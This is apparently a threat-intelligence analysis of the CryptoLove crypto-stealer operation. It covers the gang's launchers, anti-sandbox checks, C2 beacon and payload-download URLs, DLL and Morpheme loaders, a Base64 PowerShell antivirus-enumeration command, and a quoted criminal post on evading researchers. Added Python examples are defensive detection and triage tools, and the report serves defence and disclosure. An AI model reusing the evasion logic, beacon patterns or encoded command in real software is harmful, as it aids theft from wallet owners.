  • Coinbase Wallet: aholpfdialjgjfhomihkjbmgjidlcdno
  • Trezor Wallet: dmkamcknogkgcdfhhbddcghachkejeap
  • Ledger Live: efbglgofoippbgcjepnhiblaibcnclgk
  • Trust Wallet: nkbihfbeogaeaoehlefnkodbefgpgknn
  • Math Wallet: fcckkdbjnoikooededlapcalpionmalo
  • Guarda Wallet: bfnaelmomeimhlpmgjnjophhpkkoljpa
  • SafePal Wallet: opfgelmcmbiajamepnmloijbpoleiama
  • Nifty Wallet: fnjhmkhhmkbjkkabndcnnogagogbneec
  • Zerion Wallet: aiifbnbfobpmeekipheeijimdpnlpgpp
  • Liquality Wallet: opcgpfmipidbgpenhmajoajpbobppdil
  • Exodus Wallet: egjidjbpglichdcondbcbdnbeeppgdph
  • MyEtherWallet (MEW): ppbibelpcjmhbdihakflkdcoccbgbkpo
  • Ronin Wallet: ffnbelfdoeiohenkjibnmadjiehjhajb
  • Keplr Wallet: jnlgamecbpmbajjfhmmmlhejkemejdma
Method that retrieves AVs on the victim’s machine

Next, the binary checks whether it is running in a sandboxed or emulated environment with the CheckEmulation() method. The check fails if any of these conditions is true:

  • Available memory is less than 4 GB (MainWindow.Memory()).
  • The current directory is the root of the drive (C:\).
  • The current directory is the system's temporary directory (Path.GetTempPath()).
  • The executable file name (without extension) is longer than 11 characters.
  • The username or machine name matches one of the hardcoded values WALKER, WALKER-PC, John, or JOHN-PC.

If the check fails, sendclick1() reports it to the server with status=2 (e.g., hxxps://xilloolli[.]com/api.php?status=2&wallets=0&av=1), and the victim sees a warning about a detected virtual machine: "An attempt to launch a program using a virtual machine was detected. Update rejected (error code: D24VM09)."

If the user clicks on “Cancel” from the fake installer window, the sendclick1() also gets triggered, and it sends a request to the server with a status indicating that the Cancel button was clicked, along with other system information like detected wallets or antivirus software.
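Because these checks decide whether the launcher detonates at all, an analyst wants to verify a detonation VM against them before wasting a run. The following Python is an added example written for this article, not code from the launcher or from TRACLabs: evaluate() takes a snapshot of the environment and returns the conditions the launcher would trip, and snapshot_local() builds that snapshot from the host it runs on. Comparing names case-insensitively is an assumption (the launcher's exact comparison is not documented), and the profiles used in testing are constructed.

```python
"""Pre-flight check of an analysis VM against the launcher's CheckEmulation() conditions.
Added example for this article; not code from the launcher itself."""
import os
import platform
import re
import sys
import tempfile

HARDCODED_NAMES = {"WALKER", "WALKER-PC", "JOHN", "JOHN-PC"}  # values named in the article
MAX_EXE_STEM_LEN = 11                                        # file name without extension
MIN_AVAILABLE_BYTES = 4 * 1024 ** 3                          # "less than 4 GB" trips the check
DRIVE_ROOT = re.compile(r"^[a-z]:$", re.I)                   # e.g. "C:" once the slash is stripped


def _norm(path):
    return os.path.normcase(path).rstrip("\\/")


def evaluate(profile):
    """Return the launcher conditions this environment would trip; [] means the launcher proceeds.

    profile keys: memory_bytes, cwd, temp, exe, user, host
    """
    tripped = []
    if profile["memory_bytes"] < MIN_AVAILABLE_BYTES:
        tripped.append("memory<4GB")
    cwd, temp = _norm(profile["cwd"]), _norm(profile["temp"])
    if cwd == "" or DRIVE_ROOT.match(cwd):
        tripped.append("cwd=drive-root")
    if cwd == temp:
        tripped.append("cwd=temp")
    stem = os.path.splitext(os.path.basename(profile["exe"].replace("\\", "/")))[0]
    if len(stem) > MAX_EXE_STEM_LEN:
        tripped.append("exe-name>11")
    # Assumption: case-insensitive match; the article does not state how the launcher compares.
    if profile["user"].upper() in HARDCODED_NAMES or profile["host"].upper() in HARDCODED_NAMES:
        tripped.append("hardcoded-name")
    return tripped


def _available_memory():
    """Available physical memory in bytes (GlobalMemoryStatusEx on Windows, sysconf elsewhere)."""
    if sys.platform == "win32":
        import ctypes

        class MEMORYSTATUSEX(ctypes.Structure):
            _fields_ = [("dwLength", ctypes.c_ulong), ("dwMemoryLoad", ctypes.c_ulong),
                        ("ullTotalPhys", ctypes.c_ulonglong), ("ullAvailPhys", ctypes.c_ulonglong),
                        ("ullTotalPageFile", ctypes.c_ulonglong), ("ullAvailPageFile", ctypes.c_ulonglong),
                        ("ullTotalVirtual", ctypes.c_ulonglong), ("ullAvailVirtual", ctypes.c_ulonglong),
                        ("ullAvailExtendedVirtual", ctypes.c_ulonglong)]

        st = MEMORYSTATUSEX()
        st.dwLength = ctypes.sizeof(st)
        ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(st))
        return st.ullAvailPhys
    return os.sysconf("SC_PAGE_SIZE") * os.sysconf("SC_AVPHYS_PAGES")


def snapshot_local(exe=None):
    """Build a profile for the host this runs on; exe defaults to this script's own name."""
    try:
        user = os.getlogin()
    except OSError:
        user = os.environ.get("USERNAME") or os.environ.get("USER", "")
    return {"memory_bytes": _available_memory(), "cwd": os.getcwd(), "temp": tempfile.gettempdir(),
            "exe": exe or sys.argv[0], "user": user, "host": platform.node()}


if __name__ == "__main__":
    print(evaluate(snapshot_local()) or "sandbox passes the launcher's checks")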

Fake Installer window

If the launcher continues, the PolicyGeneretic() method is triggered. It orchestrates three tasks (TaskLoad, TaskLoad2, and TaskLoad3) responsible for downloading and executing the payloads. It first checks whether the folder C:\Program Files\microsoftgame exists and creates it if not; this folder stores the payloads. TaskLoad, TaskLoad2, and TaskLoad3 then run sequentially, separated by sleeps of 15 and 20 seconds, respectively.

TaskLoad:

  • Checks whether the file 1.exe already exists in the target directory; if it does, it is deleted so that the latest version is downloaded.
  • Reports the download attempt via download_first_bug(); the request looks like hxxp://xilloolli[.]com/api-debug.php?status=2&proc=Intel(R)%20Core(TM)%20i7-9700K%20CPU%20@%203.60GHz&av=1, where proc= carries the CPU name retrieved from the infected machine.
  • Executes 1.exe from the saved location and reports success via sendopen1() and opened_first_bug(): sendopen1() sends hxxp://xilloolli[.]com/api.php?status=4&wallets=1,5,7&av=1,3 and opened_first_bug() sends hxxp://xilloolli[.]com/api-debug.php?status=3&proc=Intel(R)%20Core(TM)%20i7-9700K%20CPU%20@%203.60GHz&av=1,3, i.e., status=4 and status=3 respectively.
  • If the file cannot be executed, the error is logged to the server via error_on_openning_first_bug() with a request like hxxp://xilloolli[.]com/api-debug.php?status=11&error=error_message.
  • If the file exists but still cannot be executed, the fallback reports status=12 to the server and proceeds to the next task (TaskLoad2).
  • If the file does not exist, it reports ?status=11&error=No%20File.
  • If the download fails, the error is logged via error_on_downloading_first_bug() with ?status=10&error=error_message and execution proceeds to TaskLoad2.

Similar actions are performed with TaskLoad2 and TaskLoad3, but different payloads and status codes are used. Here is the table of the payloads and codes:
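The api.php and api-debug.php beacons described above are simple enough to parse straight out of proxy logs. The following Python is an added example written for this article, not code from CryptoLove's launcher or from TRACLabs: it refangs the defanged URLs, classifies each beacon by endpoint and status code using the meanings given in this section, and maps the 1-based wallet indices back to extension names. The wallet numbering is assumed to follow the order of the wallet list above (the launcher's real ordering is not shown), the AV ID mapping is limited to the two examples the article gives, and the proxy log lines are constructed.

```python
"""Parse the launcher's api.php / api-debug.php beacons out of proxy logs.
Added example for this article; not code from the launcher or from TRACLabs."""
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: the launcher's 1-based wallet indices follow the order of the list in the article.
WALLET_INDEX = {
    1: "MetaMask", 2: "Phantom Wallet", 3: "Binance Chain Wallet", 4: "Coinbase Wallet",
    5: "Trezor Wallet", 6: "Ledger Live", 7: "Trust Wallet", 8: "Math Wallet",
    9: "Guarda Wallet", 10: "SafePal Wallet", 11: "Nifty Wallet", 12: "Zerion Wallet",
    13: "Liquality Wallet", 14: "Exodus Wallet", 15: "MyEtherWallet (MEW)",
    16: "Ronin Wallet", 17: "Keplr Wallet",
}
# Status codes as described for the September 2024 launcher; the two scripts use separate code spaces.
API_STATUS = {1: "launch (sendstart)", 2: "vm-detected or cancel (sendclick1)",
              3: "cancel (sendclick2, later variant)", 4: "payload executed (sendopen1)"}
DEBUG_STATUS = {2: "download attempt", 3: "payload opened", 10: "download failed",
                11: "open failed or no file", 12: "exists but cannot execute"}
AV_INDEX = {1: "Windows Defender", 2: "Kaspersky Total Security"}  # only the two IDs the article illustrates

URL_RE = re.compile(r"h(?:tt|xx)ps?://[^\s\"']+")


def refang(url):
    """Turn hxxp://host[.]tld into a parseable URL."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def _ids(csv):
    """'1,5,7' -> [1, 5, 7]; '0' -> []."""
    return [int(x) for x in csv.split(",") if x.isdigit() and int(x) != 0]


def parse_beacon(url):
    """Return a dict describing the beacon, or None if the URL is not one."""
    u = urlsplit(refang(url))
    script = u.path.rsplit("/", 1)[-1]
    tables = {"api.php": ("api", API_STATUS), "api-debug.php": ("debug", DEBUG_STATUS)}
    if script not in tables:
        return None
    q = {k: v[0] for k, v in parse_qs(u.query, keep_blank_values=True).items()}
    if not q.get("status", "").isdigit():
        return None  # same script name, but not the launcher's schema
    endpoint, table = tables[script]
    status = int(q["status"])
    out = {"host": u.hostname, "endpoint": endpoint, "status": status,
           "event": table.get(status, "unknown")}
    if "wallets" in q:
        out["wallets"] = [WALLET_INDEX.get(i, f"unknown#{i}") for i in _ids(q["wallets"])]
    if "av" in q:
        out["av_ids"] = _ids(q["av"])
        out["av"] = [AV_INDEX.get(i, f"unknown#{i}") for i in out["av_ids"]]
    if "proc" in q:
        out["cpu"] = q["proc"]   # parse_qs already URL-decodes the %20s
    if "error" in q:
        out["error"] = q["error"]
    return out


def scan_log(lines):
    """Return [(line_number, parsed_beacon)] for every log line that carries a beacon URL."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in URL_RE.finditer(line):
            parsed = parse_beacon(m.group(0))
            if parsed:
                hits.append((n, parsed))
    return hits


# Constructed proxy log lines for one infection run (not real telemetry).
SAMPLE_LOG = [
    '2024-09-12T10:01:03Z 10.0.0.23 - GET "http://xilloolli.com/api.php?status=1&wallets=1,5&av=1" 200',
    '2024-09-12T10:01:05Z 10.0.0.23 - GET "http://xilloolli.com/api-debug.php?status=2'
    '&proc=Intel(R)%20Core(TM)%20i7-9700K%20CPU%20@%203.60GHz&av=1" 200',
    '2024-09-12T10:01:09Z 10.0.0.23 - GET "https://www.example.com/api.php?page=1" 200',
    '2024-09-12T10:01:20Z 10.0.0.23 - GET "http://xilloolli.com/api.php?status=4&wallets=1,5&av=1" 200',
]

if __name__ == "__main__":
    for n, hit in scan_log(SAMPLE_LOG):
        print(n, hit)
```

The third sample line shows why the parser keys on the status parameter and not only on the script name: plenty of legitimate sites serve an api.php.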

Now let's look at the MSIX launcher (MD5 9d4302876124b31deca3254bc0d0bfee). The MSIX package contains an embedded executable named "TinyPatch.exe", a .NET single-file bundle that carries the .NET runtime and all required dependencies. VirusTotal detections for such bundled binaries are typically low.

The execution of the launcher would trigger the method below.

// TinyPatch, Version=3.29.8.0, Culture=neutral, PublicKeyToken=null
// CalculadoraWPF.MainWindow
using TinyPatch.Analizate;
using TinyPatch.Misc;

private async void InitializeAsync()
{
    Send.sendstart();
    Send.sendclick1();
    await Utils.DownloadManagment();
}

In this launcher, sendstart() initiates the main operation as in the previous launcher, while sendclick2() is triggered when the user clicks "Cancel" during the payload installation. Upon that action, a POST request is sent to the Command and Control (C2) server with the structure ?status=3&wallets=0&av=0: status=3 indicates that the installation was canceled, and wallets=0 and av=0 are always sent because this variant does not enumerate wallets or antivirus products.

After the POST request, the Utils.DownloadManagment() method runs and manages the download and execution of the payload:

  • It first checks whether the target file, 1.exe as specified in the configuration, exists in the temporary directory named "LPC"; if found, it is deleted so that a fresh payload can be downloaded.
  • It checks that the temporary directory exists and creates it if it does not.
  • It then checks for a running process named "1" (i.e., the 1.exe payload). If none is running:
    – A WebClient is initialized to download data from the pre-configured URL.
    – The downloaded payload is saved in the "LPC" directory as 1.exe.
The configuration

This launcher variant lacks functionalities for enumerating cryptocurrency wallets or antivirus programs. Additionally, it references “gravitiumgame”, a landing page previously used by Heaven Era Team.

In October 2024, CryptoLove updated its launchers by adding a layer of protection using the .NET Reactor while maintaining the same functionality in the launcher.

In November 2024, CryptoLove did a major update for their launcher. According to CryptoLove:

Completely changed the delivery system and the algorithm for loading our payloads. Now, builds are executed exclusively in memory, which removes the need for our builds to be crypted and will also increase the rate of infections 👍. Based on this, each affiliate will now have its build of the stealer.

Yes, calculating the liters of blood that researchers, defenders, and others have sucked out of us would be challenging. In this update, they completely changed the launcher’s operation. From concept — To implementation.

List of changes:

– The system of issuing the launcher has also changed: Now we issue a legitimate installer file that installs the folder with the launcher on the mammoth’s computer on the path they indicate. The folder’s contents will change depending on the branch and its legend. In all branches, there will be a custom launcher with their UI. When installing, the mammoth can either check the “launch the program after installation” and immediately open the launcher, or just open it from the folder.

– Now, to open the launcher, the mammoth needs to enter the personal promo code of the worker. Only after they enter the correct promo code will their payload begin loading. This will significantly reduce the number of detections and make analyzing the launcher almost impossible. The worker must obtain the promo code for a specific branch in the team bot. The promo code is valid only until the mammoth uses it. After the usage, the promo code becomes invalid. Give them a new promo code if you need to reinfect your mammoth. The system looks complicated, but believe me, it won’t add much discomfort to the work. Thanks to this, even getting a build for researchers, antiviruses, or any other analysts who constantly write their articles will be impossible. Hence, the launcher will be significantly cleaner.

– Thanks to the launcher update, you can now directly determine which worker brought in a specific log. A tag of the worker who brought it will be attached to each log. Determining the branch is now one hundred percent accurate, without the “probabilities” that annoyed them and us.

– The stealer has been replaced with a product that provides better feedback and collection. Also, thanks to the feature of the brute force panel for wallets from the log, the number of brutes will decrease.

– Added Anti-Ledger. Yes, that very anti-ledger that other themes advertise as “We f*ck ledgers HURRAH”. All these anti-ledgers always boil down to the human factor of the mammoth, but under the hood, it’s phishing the seed phrase from the original ledger application.”

We are very pleased that our ongoing efforts to disrupt CryptoLove’s work make them sweat. While we’ve successfully figured out their payload delivery methods, we will not disclose our techniques publicly to continue disrupting their operations effectively. But you can always reach out to us for more information.

In November 2024, CryptoLove first released their major launcher update with the same old .NET launcher, removing .NET Reactor, and then completely switched to using DevelNext, which is an IDE (Integrated Development Environment) for PHP based on JPHP.

The updated .NET launcher sends a request to hxxps://apikokoapi[.]com/add_code.php?method=get&code=<code_entered>. If the JSON response reports the code as valid ({"available":true,"code":"XYZ","username":"#worker_handle"}), the launcher retrieves the payload from 77.105.166[.]229/qicudt52b.dll. Further POST requests that log and register the device go to hxxps://service-government[.]com/api.php.

qicudt52b.dll is a DLL loader whose PDB path, C:\Users\Администратор\Documents\Pe-Loader-Sample-master\Release\Pe-Loader-Sample.pdb, points to the open-source Pe-Loader-Sample project (see References). The injection uses the process hollowing technique. The DLL executes one of the payloads fetched from these hardcoded URLs:

  • hxxp://77.105.166[.]229/beast2 — LummaC2 Stealer
  • hxxp://77.105.166[.]229/beast1 — StealC
Snippet of qicudt52b.dll

It’s worth noting that some affiliates can have their Build names for LummaC2 and StealC, for example:

  • ObmantVault — obman
  • Yellow Empire — yellow
  • Mr. Best — beast
  • PROFIT Team — profitable (observed the same Build ID across multiple affiliates)

They continue using them despite saying they have moved away from the stealers.

Later in November 2024, CryptoLove switched to a different loader named Morpheme, which drops LummaC2, StealC, or Rhadamanthys.

The loader uses reflective loading to allocate memory for, map, and execute the payload inside the current process, and relies on the AsmJit library to allocate and manage the executable memory for the payload. API names in Morpheme are obfuscated with a simple XOR, and the binary is padded with junk functions that make reversing it time-consuming.

InternetReadFile API obfuscated with XOR (Morpheme32.exe)

Detection

  • Look for the following folder creations under C:\:
    – Cache_client\x86
    – [a-f0-9]{32}\Morpheme32.exe
  • Inspect the network pattern where the URL ends with .php?status=1&wallets=0&av=0&worker=NONE&promo=NONE (the initial connection to the server).
  • Look for additional payload retrieval from:
    – 77.105.166[.]229/second
    – 77.105.166[.]229/first
  • The launcher uses a Base64-encoded PowerShell command to enumerate the antivirus products:
C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -inputformat none -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('W0NvbnNvbGVdOjpPdXRwdXRFbmNvZGluZyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjgKJEFudGl2aXJ1c1Byb2R1Y3RzID0gR2V0LVdtaU9iamVjdCAtTmFtZXNwYWNlICJyb290XFNlY3VyaXR5Q2VudGVyMiIgLUNsYXNzIEFudGlWaXJ1c1Byb2R1Y3QKCmZvcmVhY2ggKCRQcm9kdWN0IGluICRBbnRpdmlydXNQcm9kdWN0cykgewogICAgV3JpdGUtSG9zdCAkUHJvZHVjdC5kaXNwbGF5TmFtZQp9')))"

Which decodes to:

[Console]::OutputEncoding = [System.Text.Encoding]::UTF8
$AntivirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct

foreach ($Product in $AntivirusProducts) {
    Write-Host $Product.displayName
}
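To turn the indicators above into something that runs, here is an added example, not part of the original article and not the Sigma rules it links, that triages Sysmon-style file, process and network events against them in Python: the folder and drop-path patterns, the initial-beacon and payload-fetch URL patterns, and a decoder that pulls the FromBase64String() argument out of a PowerShell command line and flags the root\SecurityCenter2 AntiVirusProduct query. The events are constructed, the beacon host c2.invalid is a placeholder, and the only real artifact embedded is the Base64 blob shown above.

```python
"""Triage Sysmon-style events against the Morpheme/launcher indicators listed above.
Added example for this article; not TRACLabs' Sigma rules and not the launcher's code."""
import base64
import re

# The Base64 blob from the launcher's PowerShell command quoted above.
AV_ENUM_B64 = "W0NvbnNvbGVdOjpPdXRwdXRFbmNvZGluZyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjgKJEFudGl2aXJ1c1Byb2R1Y3RzID0gR2V0LVdtaU9iamVjdCAtTmFtZXNwYWNlICJyb290XFNlY3VyaXR5Q2VudGVyMiIgLUNsYXNzIEFudGlWaXJ1c1Byb2R1Y3QKCmZvcmVhY2ggKCRQcm9kdWN0IGluICRBbnRpdmlydXNQcm9kdWN0cykgewogICAgV3JpdGUtSG9zdCAkUHJvZHVjdC5kaXNwbGF5TmFtZQp9"

FILE_RULES = [
    # C:\Cache_client\x86 itself or anything created beneath it
    ("cache_client_dir", re.compile(r"^[a-z]:\\Cache_client\\x86(?:\\|$)", re.I)),
    # <32 hex chars>\Morpheme32.exe anywhere in the path
    ("morpheme_drop", re.compile(r"\\[a-f0-9]{32}\\Morpheme32\.exe$", re.I)),
]
NET_RULES = [
    ("initial_beacon", re.compile(r"\.php\?status=1&wallets=0&av=0&worker=NONE&promo=NONE$")),
    ("payload_fetch", re.compile(r"^https?://77\.105\.166\.229/(?:first|second)$")),
]
B64_ARG = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")


def decode_ps_b64(cmdline):
    """Decode every FromBase64String('...') argument found in a PowerShell command line."""
    bodies = []
    for blob in B64_ARG.findall(cmdline):
        try:
            bodies.append(base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64/UTF-8: leave it for a human
    return bodies


def is_av_enum(body):
    """True if a decoded script queries AntiVirusProduct under root\\SecurityCenter2."""
    return bool(re.search(r"SecurityCenter2", body, re.I) and re.search(r"AntiVirusProduct", body, re.I))


def triage(events):
    """Return [(rule, event)] for events of type file (path), process (cmdline) or net (url)."""
    hits = []
    for ev in events:
        if ev["type"] == "file":
            hits += [(name, ev) for name, rx in FILE_RULES if rx.search(ev["path"])]
        elif ev["type"] == "net":
            hits += [(name, ev) for name, rx in NET_RULES if rx.search(ev["url"])]
        elif ev["type"] == "process":
            if any(is_av_enum(b) for b in decode_ps_b64(ev["cmdline"])):
                hits.append(("av_enum_via_wmi", ev))
    return hits


# Constructed events, not real telemetry; c2.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"type": "file", "path": r"C:\Cache_client\x86"},
    {"type": "file", "path": r"C:\3f2a9c1e8b7d4f60a1b2c3d4e5f60718\Morpheme32.exe"},
    {"type": "file", "path": r"C:\Program Files\Vendor\Morpheme32.exe"},  # no hex directory: no hit
    {"type": "process", "cmdline": (
        r'C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -inputformat none -command '
        '"Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\''
        + AV_ENUM_B64 + '\')))"')},
    {"type": "net", "url": "http://77.105.166.229/first"},
    {"type": "net", "url": "https://c2.invalid/api.php?status=1&wallets=0&av=0&worker=NONE&promo=NONE"},
    {"type": "net", "url": "https://www.example.com/api.php?status=1"},  # benign lookalike: no hit
]

if __name__ == "__main__":
    for rule, ev in triage(SAMPLE_EVENTS):
        print(rule, ev)
```

Decoding the Base64 rather than matching the blob verbatim matters: a re-encoded or slightly edited script still carries the SecurityCenter2/AntiVirusProduct pair, which is the behaviour worth alerting on.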

For Sigma rules, please refer to the GitHub page.

Summarization of Victims

From November 2, 2022, to November 25, 2024, 22,105 victims’ IPs were available; we can only share the victims’ IPs with law enforcement if needed.

Here is the summary of the IPs based on the country:

  • https://ipinfo.io/tools/summarize-ips/8f1e370e-937b-4088-96f0-670252fda333

Although the first entry in the profit records channel was made on May 9th, 2022, it wasn’t until May 21st, 2024, that the CryptoLove payments records included the IP address of the alleged victim from whom money was stolen, along with the landing page used by CryptoLove that enabled the worker to retrieve the log from the victim. The format used for these announcements of a successful payment is:

CryptoLove announcement of a payment to a worker

Up to this day, there have been 393 alleged successful payments to workers from victims worldwide, following the format mentioned above. Please note that these payments to workers represent a percentage of the amount stolen from the victim, and this percentage varies depending on the affiliate’s rules for each landing.

The highest payment was made to the worker #Genatop4ik in the Orbit project on March 18th, 2024 (the PROFIT Team still uses this landing page). The amount paid was $186,328, from an undisclosed victim. MxDuke, the admin of the PROFIT Team, mentioned in an interview with CryptoLove that this represented 50% of the money stolen, a total of 372 thousand dollars in Solana.

If you believe you were a victim of CryptoLove at any point, please feel free to contact us for further assistance. You can also reach out to us for more detection and hunting tips.

Indicators of Compromise

References

https://github.com/TRACLabs1/Config_extractors/tree/main

https://github.com/abhisek/Pe-Loader-Sample/tree/master

https://gist.github.com/TRACLabs1/01eeb350cf7ae02ed8fddca0ec089f5f


Full Research: https://medium.com/@traclabs_/hearts-stolen-wallets-emptied-insights-into-cryptolove-traffers-team-3f65e84ccebe?source=rss-6a3005ed0ee2——2